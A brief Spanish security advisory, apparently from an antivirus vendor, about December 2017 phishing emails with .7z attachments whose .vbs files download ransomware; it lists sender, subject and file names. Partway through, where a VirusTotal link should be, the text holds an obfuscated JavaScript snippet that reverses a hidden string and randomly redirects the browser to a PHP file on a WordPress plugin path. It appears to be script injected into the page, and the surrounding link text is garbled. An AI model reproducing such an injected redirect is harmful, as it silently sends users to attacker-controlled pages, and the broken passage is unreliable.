VARIOS MAILS SIMILARES ANEXANDO EMPAQUETADO .7z con ficheros .VBS que descargan e instalan RANSOMWARE DOC

Pues ha cambiado la moda, y ahora los empaquetados contienen ficheros malware .vbs en lugar de los anteriores .js, si bien descargan igualmente ransomware DOC

El contenido de los mails es tipicamente similar a:

Asunto: CCE28122017_006769
De: Porfirio <Porfirio@tagscan.nl>
Fecha: 28/12/2017 13:38
Para: “destinatario”

Anexado CCE28122017_005052.7z   —> conteniendo CCE28122017_005872.vbs que instala Ransomware DOC

y otros similares anexando:

CCE28122017_005207.7z

CCE28122017_005757.7z

CCE28122017_006769.7z

Los cuales contienen .vbs que descargan fichero EXE que pasamos a controlar a partir del ELISTARA 38.13 de hoy

total del primero de los ficheros indicado ofrece el siguiente informe:

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/es/file/e53c5d24bdec8bb4170809a9f8deef8595cf308aeea6b2c2ade68dfddf591b49/analysis/1514475865/” target=”_blank” rel=”noopener”>y el EXE instalado, que pasamos a controlar,  ofrece el siguiente informe:

saludos

ms, 28/12/2017